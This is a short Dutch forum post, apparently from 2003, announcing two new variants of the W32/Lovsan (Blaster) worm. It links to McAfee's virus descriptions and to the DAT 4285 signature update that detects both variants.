- W32/Lovsan.worm.b (de eerste nieuwe variant): http://vil.nai.com/vil/content/v_100551.htm
- W32/Lovsan.worm.c (tweede nieuwe variant): http://vil.nai.com/vil/content/v_100552.htm
Zojuist (15 minuten geleden) heeft McAfee de DAT-versie 4285 gereleased, die beide nieuwe varianten af kan vangen (4284 kon het origineel al afvangen).
Nieuwste SuperDAT-file vind je op http://a64.g.akamai.net/7...nglish/intel/sdat4285.exe
Virussen? Scan ze hier!
Dit topic is gesloten.